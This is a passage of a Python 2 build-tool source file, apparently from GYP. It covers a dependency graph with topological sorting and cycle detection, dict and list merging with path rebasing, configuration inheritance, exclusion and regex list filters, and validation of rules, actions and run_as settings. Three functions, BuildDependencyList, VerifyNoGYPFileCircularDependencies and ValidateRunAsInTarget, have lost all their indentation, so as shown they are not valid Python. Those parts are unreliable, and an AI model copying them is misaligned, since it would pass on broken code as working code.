    dependents: List of DependencyGraphNodes that depend on this one.
  """

  class CircularException(Exception):
    """Raised when a cycle is detected in the dependency graph."""
    pass

  def __init__(self, ref):
    self.ref = ref
    self.dependencies = []
    self.dependents = []

  def FlattenToList(self):
    """Topologically sorts the graph rooted at self (Kahn's algorithm).

    Returns a list of the "ref" attributes of the reachable nodes; every
    ref appears after all of its dependencies and before all of its
    dependents.  Call this on the root node (the one whose dependents are
    the zero-dependency nodes).
    """
    # flat_list is the sorted list of dependencies - actually, the list items
    # are the "ref" attributes of DependencyGraphNodes.  Every target will
    # appear in flat_list after all of its dependencies, and before all of
    # its dependents.
    flat_list = []
    # Membership is also tracked in a set: probing "ref in flat_list" on the
    # list itself is O(n) and made the loop below quadratic.  refs are
    # expected to be hashable (target/build-file name strings).
    flat_set = set()

    # in_degree_zeros is the list of DependencyGraphNodes that have no
    # dependencies not in flat_list.  Initially, it is a copy of the children
    # of this node, because when the graph was built, nodes with no
    # dependencies were made implicit dependents of the root node.
    in_degree_zeros = self.dependents[:]

    while in_degree_zeros:
      # Nodes in in_degree_zeros have no dependencies not in flat_list, so
      # they can be appended to flat_list.  Take these nodes out of
      # in_degree_zeros as work progresses, so that the next node to process
      # from the list can always be accessed at a consistent position.
      node = in_degree_zeros.pop(0)
      flat_list.append(node.ref)
      flat_set.add(node.ref)

      # Look at dependents of the node just added to flat_list.  Some of them
      # may now belong in in_degree_zeros.
      for node_dependent in node.dependents:
        is_in_degree_zero = True
        for node_dependent_dependency in node_dependent.dependencies:
          if node_dependent_dependency.ref not in flat_set:
            # The dependent has one or more dependencies not in flat_list.
            # There will be more chances to add it to flat_list when
            # examining it again as a dependent of those other dependencies,
            # provided that there are no cycles.
            is_in_degree_zero = False
            break

        if is_in_degree_zero:
          # All of the dependent's dependencies are already in flat_list.
          # Add it to in_degree_zeros where it will be processed in a future
          # iteration of the outer loop.
          in_degree_zeros.append(node_dependent)

    return flat_list

  def DirectDependencies(self, dependencies=None):
    """Returns a list of just direct dependencies."""
    if dependencies is None:
      dependencies = []

    for dependency in self.dependencies:
      # Check for None, corresponding to the root node.
      if dependency.ref is not None and dependency.ref not in dependencies:
        dependencies.append(dependency.ref)

    return dependencies

  def _AddImportedDependencies(self, targets, dependencies=None):
    """Given a list of direct dependencies, adds indirect dependencies that
    other dependencies have declared to export their settings.

    This method does not operate on self.  Rather, it operates on the list
    of dependencies in the |dependencies| argument.  For each dependency in
    that list, if any declares that it exports the settings of one of its
    own dependencies, those dependencies whose settings are "passed through"
    are added to the list.  As new items are added to the list, they too
    will be processed, so it is possible to import settings through multiple
    levels of dependencies.

    This method is not terribly useful on its own, it depends on being
    "primed" with a list of direct dependencies such as one provided by
    DirectDependencies.  DirectAndImportedDependencies is intended to be the
    public entry point.
    """
    if dependencies is None:
      dependencies = []

    index = 0
    while index < len(dependencies):
      dependency = dependencies[index]
      dependency_dict = targets[dependency]
      # Add any dependencies whose settings should be imported to the list
      # if not already present.  Newly-added items will be checked for their
      # own imports when the list iteration reaches them.  Rather than
      # simply appending new items, insert them after the dependency that
      # exported them.  This is done to more closely match the depth-first
      # method used by DeepDependencies.
      add_index = 1
      for imported_dependency in \
          dependency_dict.get('export_dependent_settings', []):
        if imported_dependency not in dependencies:
          dependencies.insert(index + add_index, imported_dependency)
          add_index = add_index + 1
      index = index + 1

    return dependencies

  def DirectAndImportedDependencies(self, targets, dependencies=None):
    """Returns a list of a target's direct dependencies and all indirect
    dependencies that a dependency has advertised settings should be
    exported through the dependency for.
    """
    dependencies = self.DirectDependencies(dependencies)
    return self._AddImportedDependencies(targets, dependencies)

  def DeepDependencies(self, dependencies=None):
    """Returns a list of all of a target's dependencies, recursively."""
    if dependencies is None:
      dependencies = []

    for dependency in self.dependencies:
      # Check for None, corresponding to the root node.
      if dependency.ref is not None and dependency.ref not in dependencies:
        dependencies.append(dependency.ref)
        dependency.DeepDependencies(dependencies)

    return dependencies

  def LinkDependencies(self, targets, dependencies=None, initial=True):
    """Returns a list of dependency targets that are linked into this target.

    This function has a split personality, depending on the setting of
    |initial|.  Outside callers should always leave |initial| at its default
    setting.

    When adding a target to the list of dependencies, this function will
    recurse into itself with |initial| set to False, to collect dependencies
    that are linked into the linkable target for which the list is being
    built.
    """
    if dependencies is None:
      dependencies = []

    # Check for None, corresponding to the root node.
    if self.ref is None:
      return dependencies

    # It's kind of sucky that |targets| has to be passed into this function,
    # but that's presently the easiest way to access the target dicts so
    # that this function can find target types.
    if 'target_name' not in targets[self.ref]:
      raise Exception("Missing 'target_name' field in target.")

    try:
      target_type = targets[self.ref]['type']
    except KeyError:
      raise Exception("Missing 'type' field in target %s" %
                      targets[self.ref]['target_name'])

    is_linkable = target_type in linkable_types

    if initial and not is_linkable:
      # If this is the first target being examined and it's not linkable,
      # return an empty list of link dependencies, because the link
      # dependencies are intended to apply to the target itself (initial is
      # True) and this target won't be linked.
      return dependencies

    # Executables and loadable modules are already fully and finally linked.
    # Nothing else can be a link dependency of them, there can only be
    # dependencies in the sense that a dependent target might run an
    # executable or load the loadable_module.
    if not initial and target_type in ('executable', 'loadable_module'):
      return dependencies

    # The target is linkable, add it to the list of link dependencies.
    if self.ref not in dependencies:
      if target_type != 'none':
        # Special case: "none" type targets don't produce any linkable
        # products and shouldn't be exposed as link dependencies, although
        # dependencies of "none" type targets may still be link
        # dependencies.
        dependencies.append(self.ref)
      if initial or not is_linkable:
        # If this is a subsequent target and it's linkable, don't look any
        # further for linkable dependencies, as they'll already be linked
        # into this target linkable.  Always look at dependencies of the
        # initial target, and always look at dependencies of non-linkables.
        for dependency in self.dependencies:
          dependency.LinkDependencies(targets, dependencies, False)

    return dependencies
def BuildDependencyList(targets):
# Create a DependencyGraphNode for each target. Put it into a dict for easy
# access.
dependency_nodes = {}
for target, spec in targets.iteritems():
if not target in dependency_nodes:
dependency_nodes[target] = DependencyGraphNode(target)
# Set up the dependency links. Targets that have no dependencies are treated
# as dependent on root_node.
root_node = DependencyGraphNode(None)
for target, spec in targets.iteritems():
target_node = dependency_nodes[target]
target_build_file = gyp.common.BuildFile(target)
if not 'dependencies' in spec or len(spec['dependencies']) == 0:
target_node.dependencies = [root_node]
root_node.dependents.append(target_node)
else:
dependencies = spec['dependencies']
for index in xrange(0, len(dependencies)):
try:
dependency = dependencies[index]
dependency_node = dependency_nodes[dependency]
target_node.dependencies.append(dependency_node)
dependency_node.dependents.append(target_node)
except KeyError, e:
gyp.common.ExceptionAppend(e,
'while trying to load target %s' % target)
raise
flat_list = root_node.FlattenToList()
# If there's anything left unvisited, there must be a circular dependency
# (cycle). If you need to figure out what's wrong, look for elements of
# targets that are not in flat_list.
if len(flat_list) != len(targets):
raise DependencyGraphNode.CircularException, \
'Some targets not reachable, cycle in dependency graph detected'
return [dependency_nodes, flat_list]
def VerifyNoGYPFileCircularDependencies(targets):
# Create a DependencyGraphNode for each gyp file containing a target. Put
# it into a dict for easy access.
dependency_nodes = {}
for target in targets.iterkeys():
build_file = gyp.common.BuildFile(target)
if not build_file in dependency_nodes:
dependency_nodes[build_file] = DependencyGraphNode(build_file)
# Set up the dependency links.
for target, spec in targets.iteritems():
build_file = gyp.common.BuildFile(target)
build_file_node = dependency_nodes[build_file]
target_dependencies = spec.get('dependencies', [])
for dependency in target_dependencies:
try:
dependency_build_file = gyp.common.BuildFile(dependency)
if dependency_build_file == build_file:
# A .gyp file is allowed to refer back to itself.
continue
dependency_node = dependency_nodes[dependency_build_file]
if dependency_node not in build_file_node.dependencies:
build_file_node.dependencies.append(dependency_node)
dependency_node.dependents.append(build_file_node)
except KeyError, e:
gyp.common.ExceptionAppend(
e, 'while computing dependencies of .gyp file %s' % build_file)
raise
# Files that have no dependencies are treated as dependent on root_node.
root_node = DependencyGraphNode(None)
for build_file_node in dependency_nodes.itervalues():
if len(build_file_node.dependencies) == 0:
build_file_node.dependencies.append(root_node)
root_node.dependents.append(build_file_node)
flat_list = root_node.FlattenToList()
# If there's anything left unvisited, there must be a circular dependency
# (cycle).
if len(flat_list) != len(dependency_nodes):
bad_files = []
for file in dependency_nodes.iterkeys():
if not file in flat_list:
bad_files.append(file)
raise DependencyGraphNode.CircularException, \
'Some files not reachable, cycle in .gyp file dependency graph ' + \
'detected involving some or all of: ' + \
' '.join(bad_files)
def DoDependentSettings(key, flat_list, targets, dependency_nodes):
  """Merges each target's |key| dict into the targets that depend on it.

  key must be one of 'all_dependent_settings', 'direct_dependent_settings',
  or 'link_settings'; it selects which class of dependencies supplies the
  settings that get merged into each target in |flat_list|.
  """
  for target in flat_list:
    target_dict = targets[target]
    build_file = gyp.common.BuildFile(target)

    # Pick the dependency set that matches the settings class.
    if key == 'all_dependent_settings':
      dependencies = dependency_nodes[target].DeepDependencies()
    elif key == 'direct_dependent_settings':
      dependencies = \
          dependency_nodes[target].DirectAndImportedDependencies(targets)
    elif key == 'link_settings':
      dependencies = dependency_nodes[target].LinkDependencies(targets)
    else:
      raise KeyError("DoDependentSettings doesn't know how to determine "
                     'dependencies for ' + key)

    for dependency in dependencies:
      dependency_dict = targets[dependency]
      if key not in dependency_dict:
        continue
      dependency_build_file = gyp.common.BuildFile(dependency)
      MergeDicts(target_dict, dependency_dict[key],
                 build_file, dependency_build_file)
def AdjustStaticLibraryDependencies(flat_list, targets, dependency_nodes):
  """Normalizes "dependencies" lists with respect to static libraries.

  Recompute target "dependencies" properties.  For each static library
  target, remove "dependencies" entries referring to other static libraries,
  unless the dependency has the "hard_dependency" attribute set.  For each
  linkable target, add a "dependencies" entry referring to all of the
  target's computed list of link dependencies (including static libraries)
  if no such entry is already present.
  """
  for target in flat_list:
    target_dict = targets[target]
    target_type = target_dict['type']

    if target_type == 'static_library':
      if not 'dependencies' in target_dict:
        continue

      # Keep a pristine copy of the list before pruning, presumably for
      # later consumers -- confirm against the generators.
      target_dict['dependencies_original'] = target_dict.get(
          'dependencies', [])[:]

      index = 0
      while index < len(target_dict['dependencies']):
        dependency = target_dict['dependencies'][index]
        dependency_dict = targets[dependency]
        if dependency_dict['type'] == 'static_library' and \
           (not 'hard_dependency' in dependency_dict or \
            not dependency_dict['hard_dependency']):
          # A static library should not depend on another static library
          # unless the dependency relationship is "hard," which should only
          # be done when a dependent relies on some side effect other than
          # just the build product, like a rule or action output.  Take the
          # dependency out of the list, and don't increment index because
          # the next dependency to analyze will shift into the index
          # formerly occupied by the one being removed.
          del target_dict['dependencies'][index]
        else:
          index = index + 1

      # If the dependencies list is empty, it's not needed, so unhook it.
      if len(target_dict['dependencies']) == 0:
        del target_dict['dependencies']

    elif target_type in linkable_types:
      # Get a list of dependency targets that should be linked into this
      # target.  Add them to the dependencies list if they're not already
      # present.
      link_dependencies = dependency_nodes[target].LinkDependencies(targets)
      for dependency in link_dependencies:
        if dependency == target:
          continue
        if not 'dependencies' in target_dict:
          target_dict['dependencies'] = []
        if not dependency in target_dict['dependencies']:
          target_dict['dependencies'].append(dependency)
# Initialize this here to speed up MakePathRelative.
exception_re = re.compile(r'''["']?[-/$<>]''')


def MakePathRelative(to_file, fro_file, item):
  """Rebases the relative path |item| from |fro_file|'s dict to |to_file|'s.

  If item is a relative path, it's relative to the build file dict that it's
  coming from.  Fix it up to make it relative to the build file dict that
  it's going into.

  Exception: any |item| that begins with these special characters is
  returned without modification:
    /   Used when a path is already absolute (shortcut optimization;
        such paths would be returned as absolute anyway)
    $   Used for build environment variables
    -   Used for some build environment flags (such as -lapr-1 in a
        "libraries" section)
    <   Used for our own variable and command expansions (see
        ExpandVariables)
    >   Used for our own variable and command expansions (see
        ExpandVariables)
    "/' Used when a value is quoted.  If these are present, then we
        check the second character instead.
  """
  if to_file == fro_file or exception_re.match(item):
    return item
  else:
    # TODO(dglazkov) The backslash/forward-slash replacement at the end is a
    # temporary measure.  This should really be addressed by keeping all
    # paths in POSIX until actual project generation.
    ret = os.path.normpath(os.path.join(
        gyp.common.RelativePath(os.path.dirname(fro_file),
                                os.path.dirname(to_file)),
        item)).replace('\\', '/')
    # Bug fix: the old "item[-1] == '/'" raised IndexError on an empty item.
    # normpath strips a trailing slash; restore it when the input had one.
    if item.endswith('/'):
      ret += '/'
    return ret
def MergeLists(to, fro, to_file, fro_file, is_paths=False, append=True):
  """Merges list |fro| into list |to|, honoring singleton and path rules.

  Items that are strings not starting with "-", or ints, are singletons and
  appear at most once in |to|.  Dicts and sublists are deep-copied via
  MergeDicts/MergeLists.  When is_paths is true, str/int items are rebased
  with MakePathRelative.  append selects appending vs. prepending to |to|.
  """
  prepend_index = 0
  for item in fro:
    singleton = False
    if isinstance(item, (str, int)):
      # The cheap and easy case.
      if is_paths:
        to_item = MakePathRelative(to_file, fro_file, item)
      else:
        to_item = item
      # Only strings beginning with "-" may repeat; everything else in this
      # branch is a singleton, enforced by the append/prepend logic below.
      if not (isinstance(item, str) and item.startswith('-')):
        singleton = True
    elif isinstance(item, dict):
      # Copy the dictionary, continuing to look for paths to fix.  The other
      # intelligent aspects of merge processing won't apply because item is
      # being merged into an empty dict.
      to_item = {}
      MergeDicts(to_item, item, to_file, fro_file)
    elif isinstance(item, list):
      # Recurse, copying the list.  Any descendant dicts get their paths
      # fixed.  Custom is_paths/append values are dropped here on purpose:
      # they apply only to |to| and |fro|, not to sublists of |fro|, and
      # append is irrelevant since the new to_item list starts empty.
      to_item = []
      MergeLists(to_item, item, to_file, fro_file)
    else:
      raise TypeError('Attempt to merge list item of unsupported type ' +
                      item.__class__.__name__)

    if append:
      # Appending a singleton already present would duplicate it; the
      # earliest occurrence stays put.
      if not singleton or to_item not in to:
        to.append(to_item)
    else:
      # When prepending a singleton that's already present, remove the
      # existing instance first so the item lands at the earliest possible
      # position.
      while singleton and to_item in to:
        to.remove(to_item)
      # Insert successive items at increasing positions; inserting
      # everything at index 0 would reverse the prepended run.
      to.insert(prepend_index, to_item)
      prepend_index += 1
def MergeDicts(to, fro, to_file, fro_file):
  """Recursively merges the contents of dict |fro| into dict |to|.

  to_file and fro_file are the build-file paths that |to| and |fro| came
  from; they are forwarded to MakePathRelative so that values in sections
  IsPathSection classifies as paths get rebased during the merge.
  """
  # I wanted to name the parameter "from" but it's a Python keyword...
  for k, v in fro.iteritems():
    # It would be nice to do "if not k in to: to[k] = v" but that wouldn't
    # give copy semantics.  Something else may want to merge from the |fro|
    # dict later, and having the same dict ref pointed to twice in the tree
    # isn't what anyone wants considering that the dicts may subsequently be
    # modified.
    if k in to:
      bad_merge = False
      if isinstance(v, str) or isinstance(v, int):
        if not (isinstance(to[k], str) or isinstance(to[k], int)):
          bad_merge = True
      elif v.__class__ != to[k].__class__:
        bad_merge = True

      if bad_merge:
        raise TypeError, \
            'Attempt to merge dict value of type ' + v.__class__.__name__ + \
            ' into incompatible type ' + to[k].__class__.__name__ + \
            ' for key ' + k
    if isinstance(v, str) or isinstance(v, int):
      # Overwrite the existing value, if any.  Cheap and easy.
      is_path = IsPathSection(k)
      if is_path:
        to[k] = MakePathRelative(to_file, fro_file, v)
      else:
        to[k] = v
    elif isinstance(v, dict):
      # Recurse, guaranteeing copies will be made of objects that require
      # it.
      if not k in to:
        to[k] = {}
      MergeDicts(to[k], v, to_file, fro_file)
    elif isinstance(v, list):
      # Lists in dicts can be merged with different policies, depending on
      # how the key in the "from" dict (k, the from-key) is written.
      #
      # If the from-key has          ...the to-list will have this action
      # this character appended:...  applied when receiving the from-list:
      #                           =  replace
      #                           +  prepend
      #                           ?  set, only if to-list does not yet exist
      #                      (none)  append
      #
      # This logic is list-specific, but since it relies on the associated
      # dict key, it's checked in this dict-oriented function.
      ext = k[-1]
      append = True
      if ext == '=':
        list_base = k[:-1]
        lists_incompatible = [list_base, list_base + '?']
        to[list_base] = []
      elif ext == '+':
        list_base = k[:-1]
        lists_incompatible = [list_base + '=', list_base + '?']
        append = False
      elif ext == '?':
        list_base = k[:-1]
        lists_incompatible = [list_base, list_base + '=', list_base + '+']
      else:
        list_base = k
        lists_incompatible = [list_base + '=', list_base + '?']

      # Some combinations of merge policies appearing together are
      # meaningless.  It's stupid to replace and append simultaneously, for
      # example.  Append and prepend are the only policies that can coexist.
      for list_incompatible in lists_incompatible:
        if list_incompatible in fro:
          raise KeyError, 'Incompatible list policies ' + k + ' and ' + \
                          list_incompatible

      if list_base in to:
        if ext == '?':
          # If the key ends in "?", the list will only be merged if it
          # doesn't already exist.
          continue
        if not isinstance(to[list_base], list):
          # This may not have been checked above if merging in a list with
          # an extension character.
          raise TypeError, \
              'Attempt to merge dict value of type ' + \
              v.__class__.__name__ + \
              ' into incompatible type ' + to[list_base].__class__.__name__ + \
              ' for key ' + list_base + '(' + k + ')'
      else:
        to[list_base] = []

      # Call MergeLists, which will make copies of objects that require it.
      # MergeLists can recurse back into MergeDicts, although this will be
      # to make copies of dicts (with paths fixed), there will be no
      # subsequent dict "merging" once entering a list because lists are
      # always replaced, appended to, or prepended to.
      is_paths = IsPathSection(list_base)
      MergeLists(to[list_base], v, to_file, fro_file, is_paths, append)
    else:
      raise TypeError, \
          'Attempt to merge dict value of unsupported type ' + \
          v.__class__.__name__ + ' for key ' + k
def MergeConfigWithInheritance(new_configuration_dict, build_file,
                               target_dict, configuration, visited):
  """Recursively folds |configuration| and its 'inherit_from' ancestors
  from target_dict['configurations'] into new_configuration_dict.

  |visited| is the inheritance chain walked so far; revisiting a
  configuration already on the chain is a no-op, which breaks cycles.
  The transient 'abstract' marker is stripped from the merged result.
  """
  if configuration in visited:
    # Already merged along this inheritance chain; nothing more to do.
    return
  config = target_dict['configurations'][configuration]
  # Merge ancestors first so this configuration's own settings land last.
  chain = visited + [configuration]
  for parent in config.get('inherit_from', []):
    MergeConfigWithInheritance(new_configuration_dict, build_file,
                               target_dict, parent, chain)
  MergeDicts(new_configuration_dict, config, build_file, build_file)
  # 'abstract' only drives configuration expansion; keep it out of the
  # merged result.
  new_configuration_dict.pop('abstract', None)
def SetUpConfigurations(target, target_dict):
  """Expands target_dict's 'configurations' section in place.

  Each concrete (non-abstract) configuration receives a deep copy of the
  target-level settings with its 'inherit_from' chain merged in.  Keys that
  were moved into configurations are then removed from target scope,
  abstract configurations are dropped, and every remaining configuration is
  checked for keys that are only legal at target scope.

  Raises:
    KeyError: if a configuration contains a key listed in
        invalid_configuration_keys.
  """
  global non_configuration_keys
  # key_suffixes is a list of key suffixes that might appear on key names.
  # These suffixes are handled in conditional evaluations (for =, +, and ?)
  # and rules/exclude processing (for ! and /).  Keys with these suffixes
  # should be treated the same as keys without.
  key_suffixes = ['=', '+', '?', '!', '/']
  build_file = gyp.common.BuildFile(target)
  # Provide a single configuration by default if none exists.
  # TODO(mark): Signal an error if default_configurations exists but
  # configurations does not.
  if not 'configurations' in target_dict:
    target_dict['configurations'] = {'Default': {}}
  if not 'default_configuration' in target_dict:
    # Default to the alphabetically-first concrete configuration.
    concrete = [i for i in target_dict['configurations'].keys()
                if not target_dict['configurations'][i].get('abstract')]
    target_dict['default_configuration'] = sorted(concrete)[0]
  # NOTE: .keys() returns a list on Python 2, so mutating the dict while
  # looping over it below is safe here.
  for configuration in target_dict['configurations'].keys():
    old_configuration_dict = target_dict['configurations'][configuration]
    # Skip abstract configurations (saves work only).
    if old_configuration_dict.get('abstract'):
      continue
    # Configurations inherit (most) settings from the enclosing target scope.
    # Get the inheritance relationship right by making a copy of the target
    # dict.
    new_configuration_dict = copy.deepcopy(target_dict)
    # Take out the bits that don't belong in a "configurations" section.
    # Since configuration setup is done before conditional, exclude, and rules
    # processing, be careful with handling of the suffix characters used in
    # those phases.
    delete_keys = []
    for key in new_configuration_dict:
      key_ext = key[-1:]
      if key_ext in key_suffixes:
        key_base = key[:-1]
      else:
        key_base = key
      if key_base in non_configuration_keys:
        delete_keys.append(key)
    for key in delete_keys:
      del new_configuration_dict[key]
    # Merge in configuration (with all its parents first).
    MergeConfigWithInheritance(new_configuration_dict, build_file,
                               target_dict, configuration, [])
    # Put the new result back into the target dict as a configuration.
    target_dict['configurations'][configuration] = new_configuration_dict
  # Now drop all the abstract ones.
  for configuration in target_dict['configurations'].keys():
    old_configuration_dict = target_dict['configurations'][configuration]
    if old_configuration_dict.get('abstract'):
      del target_dict['configurations'][configuration]
  # Now that all of the target's configurations have been built, go through
  # the target dict's keys and remove everything that's been moved into a
  # "configurations" section.
  delete_keys = []
  for key in target_dict:
    key_ext = key[-1:]
    if key_ext in key_suffixes:
      key_base = key[:-1]
    else:
      key_base = key
    if not key_base in non_configuration_keys:
      delete_keys.append(key)
  for key in delete_keys:
    del target_dict[key]
  # Check the configurations to see if they contain invalid keys.
  for configuration in target_dict['configurations'].keys():
    configuration_dict = target_dict['configurations'][configuration]
    for key in configuration_dict.keys():
      if key in invalid_configuration_keys:
        raise KeyError, ('%s not allowed in the %s configuration, found in '
                         'target %s' % (key, configuration, target))
def ProcessListFiltersInDict(name, the_dict):
  """Process regular expression and exclusion-based filters on lists.

  An exclusion list is in a dict key named with a trailing "!", like
  "sources!".  Every item in such a list is removed from the associated
  main list, which in this example, would be "sources".  Removed items are
  placed into a "sources_excluded" list in the dict.

  Regular expression (regex) filters are contained in dict keys named with a
  trailing "/", such as "sources/" to operate on the "sources" list.  Regex
  filters in a dict take the form:
    'sources/': [ ['exclude', '_(linux|mac|win)\\.cc$'],
                  ['include', '_mac\\.cc$'] ],
  The first filter says to exclude all files ending in _linux.cc, _mac.cc, and
  _win.cc.  The second filter then includes all files ending in _mac.cc that
  are now or were once in the "sources" list.  Items matching an "exclude"
  filter are subject to the same processing as would occur if they were listed
  by name in an exclusion list (ending in "!").  Items matching an "include"
  filter are brought back into the main list if previously excluded by an
  exclusion list or exclusion regex filter.  Subsequent matching "exclude"
  patterns can still cause items to be excluded after matching an "include".
  """
  # Look through the dictionary for any lists whose keys end in "!" or "/".
  # These are lists that will be treated as exclude lists and regular
  # expression-based exclude/include lists.  Collect the lists that are
  # needed first, looking for the lists that they operate on, and assemble
  # them into |lists|.  This is done in a separate loop up front, because
  # the _included and _excluded keys need to be added to the_dict, and that
  # can't be done while iterating through it.
  lists = []
  del_lists = []
  for key, value in the_dict.iteritems():
    operation = key[-1]
    if operation != '!' and operation != '/':
      continue
    if not isinstance(value, list):
      raise ValueError, name + ' key ' + key + ' must be list, not ' + \
                        value.__class__.__name__
    list_key = key[:-1]
    if list_key not in the_dict:
      # This happens when there's a list like "sources!" but no corresponding
      # "sources" list.  Since there's nothing for it to operate on, queue up
      # the "sources!" list for deletion now.
      del_lists.append(key)
      continue
    if not isinstance(the_dict[list_key], list):
      raise ValueError, name + ' key ' + list_key + \
                        ' must be list, not ' + \
                        value.__class__.__name__ + ' when applying ' + \
                        {'!': 'exclusion', '/': 'regex'}[operation]
    if not list_key in lists:
      lists.append(list_key)
  # Delete the lists that are known to be unneeded at this point.
  for del_list in del_lists:
    del the_dict[del_list]
  for list_key in lists:
    the_list = the_dict[list_key]
    # Initialize the list_actions list, which is parallel to the_list.  Each
    # item in list_actions identifies whether the corresponding item in
    # the_list should be excluded, unconditionally preserved (included), or
    # whether no exclusion or inclusion has been applied.  Items for which
    # no exclusion or inclusion has been applied (yet) have value -1, items
    # excluded have value 0, and items included have value 1.  Includes and
    # excludes override previous actions.  All items in list_actions are
    # initialized to -1 because no excludes or includes have been processed
    # yet.
    list_actions = list((-1,) * len(the_list))
    exclude_key = list_key + '!'
    if exclude_key in the_dict:
      for exclude_item in the_dict[exclude_key]:
        for index in xrange(0, len(the_list)):
          if exclude_item == the_list[index]:
            # This item matches the exclude_item, so set its action to 0
            # (exclude).
            list_actions[index] = 0
      # The "whatever!" list is no longer needed, dump it.
      del the_dict[exclude_key]
    regex_key = list_key + '/'
    if regex_key in the_dict:
      for regex_item in the_dict[regex_key]:
        [action, pattern] = regex_item
        pattern_re = re.compile(pattern)
        for index in xrange(0, len(the_list)):
          list_item = the_list[index]
          if pattern_re.search(list_item):
            # Regular expression match.
            if action == 'exclude':
              # This item matches an exclude regex, so set its value to 0
              # (exclude).
              list_actions[index] = 0
            elif action == 'include':
              # This item matches an include regex, so set its value to 1
              # (include).
              list_actions[index] = 1
            else:
              # This is an action that doesn't make any sense.
              # NOTE(review): |key| below is stale -- it still holds the last
              # key visited by the first loop over the_dict rather than the
              # regex key being processed; regex_key would be accurate.
              # Confirm before changing the message.
              raise ValueError, 'Unrecognized action ' + action + ' in ' + \
                                name + ' key ' + key
      # The "whatever/" list is no longer needed, dump it.
      del the_dict[regex_key]
    # Add excluded items to the excluded list.
    #
    # Note that exclude_key ("sources!") is different from excluded_key
    # ("sources_excluded").  The exclude_key list is input and it was already
    # processed and deleted; the excluded_key list is output and it's about
    # to be created.
    excluded_key = list_key + '_excluded'
    if excluded_key in the_dict:
      raise KeyError, \
          name + ' key ' + excluded_key + ' must not be present prior ' + \
          ' to applying exclusion/regex filters for ' + list_key
    excluded_list = []
    # Go backwards through the list_actions list so that as items are deleted,
    # the indices of items that haven't been seen yet don't shift.  That means
    # that things need to be prepended to excluded_list to maintain them in the
    # same order that they existed in the_list.
    for index in xrange(len(list_actions) - 1, -1, -1):
      if list_actions[index] == 0:
        # Dump anything with action 0 (exclude).  Keep anything with action 1
        # (include) or -1 (no include or exclude seen for the item).
        excluded_list.insert(0, the_list[index])
        del the_list[index]
    # If anything was excluded, put the excluded list into the_dict at
    # excluded_key.
    if len(excluded_list) > 0:
      the_dict[excluded_key] = excluded_list
  # Now recurse into subdicts and lists that may contain dicts.
  for key, value in the_dict.iteritems():
    if isinstance(value, dict):
      ProcessListFiltersInDict(key, value)
    elif isinstance(value, list):
      ProcessListFiltersInList(key, value)
def ProcessListFiltersInList(name, the_list):
  """Recursively applies exclusion/regex list filters to every dict or
  list nested inside |the_list|.  Non-container items are left alone."""
  for element in the_list:
    if isinstance(element, dict):
      ProcessListFiltersInDict(name, element)
      continue
    if isinstance(element, list):
      ProcessListFiltersInList(name, element)
def ValidateRulesInTarget(target, target_dict, extra_sources_for_rules):
  """Ensures that the rules sections in target_dict are valid and consistent,
  and determines which sources they apply to.

  Arguments:
    target: string, name of target.
    target_dict: dict, target spec containing "rules" and "sources" lists.
    extra_sources_for_rules: a list of keys to scan for rule matches in
        addition to 'sources'.

  Raises:
    KeyError: on duplicate rule names, duplicate extensions, or a
        pre-existing 'rule_sources' key (which is output-only).
  """
  # Dicts to map between values found in rules' 'rule_name' and 'extension'
  # keys and the rule dicts themselves.
  rule_names = {}
  rule_extensions = {}
  rules = target_dict.get('rules', [])
  for rule in rules:
    # Make sure that there's no conflict among rule names and extensions.
    rule_name = rule['rule_name']
    if rule_name in rule_names:
      raise KeyError, 'rule %s exists in duplicate, target %s' % \
          (rule_name, target)
    rule_names[rule_name] = rule
    rule_extension = rule['extension']
    if rule_extension in rule_extensions:
      raise KeyError, ('extension %s associated with multiple rules, ' +
                       'target %s rules %s and %s') % \
          (rule_extension, target,
           rule_extensions[rule_extension]['rule_name'],
           rule_name)
    rule_extensions[rule_extension] = rule
    # Make sure rule_sources isn't already there.  It's going to be
    # created below if needed.
    if 'rule_sources' in rule:
      raise KeyError, \
          'rule_sources must not exist in input, target %s rule %s' % \
          (target, rule_name)
    extension = rule['extension']
    # Collect every source (from 'sources' plus any generator-provided
    # extra keys) whose file extension matches this rule's extension.
    rule_sources = []
    source_keys = ['sources']
    source_keys.extend(extra_sources_for_rules)
    for source_key in source_keys:
      for source in target_dict.get(source_key, []):
        (source_root, source_extension) = os.path.splitext(source)
        if source_extension.startswith('.'):
          # Compare without the leading dot: rule extensions are dotless.
          source_extension = source_extension[1:]
        if source_extension == extension:
          rule_sources.append(source)
    if len(rule_sources) > 0:
      rule['rule_sources'] = rule_sources
def ValidateActionsInTarget(target, target_dict, build_file):
  """Validates the actions in a target.

  Arguments:
    target: string, name of target.
    target_dict: dict, target spec; may contain an "actions" list.
    build_file: path of the build file the target came from (currently
        unused, kept for signature parity with the other validators).

  Raises:
    Exception: if any action lacks the required 'action_name' key.
  """
  target_name = target_dict.get('target_name')
  for action in target_dict.get('actions', []):
    # Every action must be named so generators and error messages can
    # refer to it unambiguously.
    if not action.get('action_name'):
      raise Exception("Anonymous action in target %s.  "
                      "An action must have an 'action_name' field." %
                      target_name)
def ValidateRunAsInTarget(target, target_dict, build_file):
target_name = target_dict.get('target_name')
run_as = target_dict.get('run_as')
if not run_as:
return
if not isinstance(run_as, dict):
raise Exception("The 'run_as' in target %s from file %s should be a "
"dictionary." %
(target_name, build_file))
action = run_as.get('action')
if not action:
raise Exception("The 'run_as' in target %s from file %s must have an "
"'action' section." %
(target_name, build_file))
if not isinstance(action, list):
raise Exception("The 'action' for 'run_as' in target %s from file %s "
"must be a list." %
(target_name, build_file))
working_directory = run_as.get('working_directory')
if working_directory and not isinstance(working_directory, str):
raise Exception("The 'working_directory' for 'run_as' in target %s "
"in file %s should be a string." %
(target_name, build_file))
environment = run_as.get('environment')
if environment and not isinstance(environment, dict):
raise Exception("The 'environment' for 'run_as' in target %s "
"in file %s should be a dictionary." %
(target_name, build_file))
def TurnIntIntoStrInDict(the_dict):
  """Given dict the_dict, recursively converts all integers into strings.

  Both int values and int keys are converted in place; nested dicts and
  lists are handled by recursion.
  """
  # Snapshot the items first: str(k) keys are inserted and int keys deleted
  # inside the loop, which is unsafe on a live dict view.  Python 2's
  # items() already returned a list; list() preserves that guarantee on
  # Python 3 as well.
  for k, v in list(the_dict.items()):
    if isinstance(v, int):
      v = str(v)
      the_dict[k] = v
    elif isinstance(v, dict):
      TurnIntIntoStrInDict(v)
    elif isinstance(v, list):
      TurnIntIntoStrInList(v)
    if isinstance(k, int):
      # Re-key the (possibly converted) value under the string form of the
      # key and drop the original int key.
      the_dict[str(k)] = v
      del the_dict[k]
def TurnIntIntoStrInList(the_list):
  """Given list the_list, recursively converts all integers into strings.

